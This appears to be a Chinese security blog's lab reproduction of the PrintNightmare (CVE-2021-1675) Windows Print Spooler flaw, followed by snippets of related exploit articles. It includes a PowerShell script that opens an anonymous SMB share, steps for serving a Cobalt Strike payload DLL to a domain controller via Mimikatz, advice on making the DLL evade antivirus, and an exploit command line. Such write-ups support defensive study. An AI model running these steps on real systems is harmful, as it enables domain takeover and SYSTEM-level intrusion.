CVE-2021-1675 漏洞復現

2022-02-07 NOVASEC
0x00 前言最近比較有熱度的一個洞,CVE-2021-1675,看著危害程度比較高,也來湊熱鬧復現一下。

該漏洞後續CVE-2021-34527,也懶得復現了,大差不差。來自推特大佬的圖鎮樓

RCE復現環境

DC:Windows Server 2019    IP:192.168.159.15

 

域主機:Win 10    

SMB伺服器:非域內PC   IP:192.168.159.129

本地提權復現環境:Windows 10  1803

 

POC

Mimikatz(https:Github腳本(https:Payload DLL:Cobalt Strike
根據官方文檔的介紹,添加印表機驅動程序的API有:RpcAddPrinterDriverEx 和 AddPrinterDriverEx。調用這兩個API需要客戶端(用戶)具有 SeLoadDriverPrivilege 權限。該權限可以使用 whoami  /priv進行查看。
漏洞利用中涉及到的函數可以在官方文檔中查閱到:
另外關於RPC編程的知識直接百度看吧,有很多文章
RCE能利用的前提:
1、域管能訪問到SMB伺服器,網絡可達
2、攻擊者在域內
3、攻擊者到域控伺服器需要一個域用戶的用戶名密碼,建立RPC連接
再說下非域的情況,非域情況也可以實現RCE,但是實現RCE的前提是需要目標主機帳戶密碼,非域的情況下主機的用戶密碼一致的情況比較少,且如果知道了主機的帳戶密碼,可直接上去提權就好。
RCE整個攻擊的代碼執行流程(截圖不是Mimikatz裡的代碼,大致是一樣的):
1、攻擊者與域控伺服器建立RPC連接,進行句柄綁定(那一長串數字是印表機接口的UUID)
2、RpcBindingSetAuthInfoExW函數進行身份驗證
3、RpcEnumPrinterDrivers函數枚舉域控機器上的已安裝的印表機驅動程序目錄
4、RpcAddPrinterDriverEx函數進行驅動安裝(正常情況使用RpcAddPrinterDriverEx函數的前提是前面RPC驗證的用戶具有SeLoadDriverPrivilege權限,漏洞的點就在於繞過了這個權限驗證)
漏洞復現過程:
1、域控伺服器上創建一個普通用戶
2、建立SMB伺服器
複製下面信息到一個PS1文件中,管理員權限運行該powershell腳本
mkdir C:\shareicacls C:\share\ /T /grant Anonymous` logon:ricacls C:\share\ /T /grant Everyone:rNew-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /fREG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /fREG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
將CS生成的dll放在SMB共享目錄中
3、Mimikatz攻擊驗證
4、成功上線,system權限
目前在Windows Server 2019上復現成功,Windows Server 2008/2012上未復現成功。Windows Server 2012系統,觀察到惡意的dll已經上傳到目標伺服器,在做備份時,創建了old目錄,後來又刪除了,原因未知,歡迎師傅找我一起探討。
另外,2019系統上線後發現沒過多久,印表機進程會崩潰掉線,所以得做上線會話遷移。
RCE的情況需要帳戶密碼的原因是因為RPC連接綁定印表機接口時,需要用戶身份驗證。對於本地提權,我們不需要帳戶密碼。也不需要搭建smb伺服器,dll直接放到主機上就好。
整個攻擊的代碼執行流程:
1、EnumPrinterDriversW函數枚舉域控機器上的印表機驅動
2、AddPrinterDriverEx函數進行驅動安裝
漏洞復現:
在漏洞利用的時候,需要對dll進行免殺,因為在漏洞利用的過程中惡意dll會在目標伺服器上落地。
另外,如果有師傅對逆向分析該漏洞代碼感興趣的,可以聯繫一起交流交流。
如您有任何投稿、問題、建議、需求、合作、請後臺留言NOVASEC公眾號!
或添加NOVASEC-MOYU 以便於及時回復。
感謝大哥們的對NOVASEC的支持點讚和關注
加入我們與萌新一起成長吧!
本團隊任何技術及文件僅用於學習分享,請勿用於任何違法活動,感謝大家的支持!!


相關焦點

  • 微軟通殺漏洞-CVE-2021-1675復現
    -2021-1675.py -h配置smb伺服器[global] workgroup = workgroup server string = test netbios name = MZ security = user map to guest = Bad User smb ports = 445 log file = /var/log/samba/log.
  • CVE-2021-1675漏洞復現
    Windows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based
  • CVE-2021-1675 分析
    一 漏洞簡介前段時間,微軟公布 Windows PrintNightmare 兩個安全漏洞,分別為CVE-2021-1675和CVE-2021-34527。公布幾天後,minikatz 率先工具化集成了 CVE-2021-1675 和 CVE-2021-34527 的 EXP。
  • CVE-2021-1675/34527:Windows Print Spooler權限提升復現
    收錄於話題 #漏洞復現文章合集Server 2019 (Server Core installation)  * Windows Server 2012 R2 (Server Core installation)* Windows Server 2012 R2* Windows Server 2012 (Server Core installation)* Windows Server 2012* Windows Server 2008
  • 微軟漏洞 Cve-2021-1675復現
    exp連結:https://github.com/cube0x0/CVE-2021-1675直接上exppython3 CVE-2021-1675.py 域名/域普通用戶名:用戶密碼@域控IP smb共享文件的路徑
  • CVE-2021-3156 漏洞復現
    漏洞介紹2021年
  • CVE-2021-40444 Office漏洞復現CS上線
    漏洞概述北京時間9月8日,微軟發布安全通告披露了Microsoft MSHTML 遠程代碼執行漏洞,攻擊者可通過製作惡意的
  • 【賊詳細 | 附PoC工具】Apache HTTPd最新RCE漏洞復現
    >docker部署命令(一):docker pull blueteamsteve/cve-2021-41773:with-cgiddocker run -d -p 7006:80 blueteamsteve/cve-2021-41773:with-cgid
  • Exchange CVE-2021-26855 漏洞復現
    0x1 漏洞概述CVE-2021-26855 是Exchange中的服務端請求偽造漏洞(SSRF),利用此漏洞的攻擊者能夠發送任意HTTP請求並繞過
  • CVE-2021-42287 域內提權漏洞復現
    CVE-2021-42287 域內提權漏洞復現 漏洞原理:如果獲得了 DC 用戶的TGT
  • CVE-2020-2883漏洞復現
    (CVE-2020-2883、CVE-2020-2884),允許未經身份驗證的攻擊者通過T3協議網絡訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致WebLogic Server被攻擊者接管,從而造成遠程代碼執行。
  • 漏洞分析 | CVE-2021-40444
    >隨著cve-2021-40444的披露,隨機引爆了全球的網絡安全,雖然最近微軟發布了補丁,但是cve-2021-40444的利用卻越發猖狂,本人深入分析了這個漏洞。最後將惡意的url改成我們自己搭建的http server,之後成功復現樣本攻擊環境,並且捕捉到了樣本通過rundll32執行了命令
  • NetLogon 域內提權漏洞(CVE-2020-1472)復現過程
    ,可利用此漏洞獲取域管訪問權限。Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)復現過程
  • CVE-2020-11107:XAMPP任意命令執行漏洞復現
    *,<7.4.40x03環境搭建● 漏洞環境:1.準備一臺裝有window系統的虛擬機,本次復現以windows10系統為例。 2.下載XAMPP,本次復現以7.2.25版本為例,下載地址:連結:https://pan.baidu.com/s/1U2w-5cIysbEIwtF9YYfOsQ 提取碼:oi88其他漏洞版本下載地址:https://sourceforge.net/projects/xampp/files/● 環境安裝和配置:
  • CVE-2021-40444 漏洞深入分析
    x-usc:http://hidusi.com/e273caf2ca371919/mountain.html"可以發現其是指向文件的更新連結從樣本庫眾獲取到mountain.html後,我們打開一看,發現全部都混淆了,基本難辨真假,去混淆也比較簡單因為是js代碼,隨便找個網上去混淆的試試,比如http://jsnice.org/
  • CVE-2017-11882 office緩存溢出漏洞復現
    電腦中有9臺電腦用的是盜版,即便激活成功大多也是盜版的授權許可,在如此大的基數下,國內辦公軟體行業市場現狀,office必定屬於前列,所以搜索相關文章,綜合分析,感覺都在說,微軟Office套件最有效的攻擊手段,是基於CVE-2017-11882的漏洞,於是乎找到cve-2017-11882這個漏洞,做漏洞復現,隨有下文。
  • Atlassian Jira 模板注入漏洞(CVE-2019-11581)復現
    漏洞描述Atlassian Jira是企業廣泛使用的項目與事務跟蹤工具,被廣泛應用於缺陷跟蹤、客戶服務、需求收集
  • vulhub漏洞復現練習——phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)
    phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)漏洞復現環境是在kali裡面配置的vulhub
  • Windows版TeamViewer漏洞復現
    近日TeamViewer團隊發布了8-15的全版本的軟體推送,在官方發布的安全公告中,修復了CVE-2020-13699漏洞。該漏洞使得程序無法正確引用其自定義URI處理程序,導致攻擊者可以通過構建惡意的URI,通過精心製作URL將惡意的iframe嵌入到網頁中。
  • Microsoft Windows Defender遠程代碼執行漏洞(CVE-2021-1647)復現
    Windows Defender 在利用內置模擬執行組件掃描可執行文件時,存在一處堆溢出漏洞。影響面評估該漏洞導致的威脅非常嚴重,不過由於Windows Defender具有聯網後自動升級補丁的能力,故該漏洞當前造成的危害影響已經不大。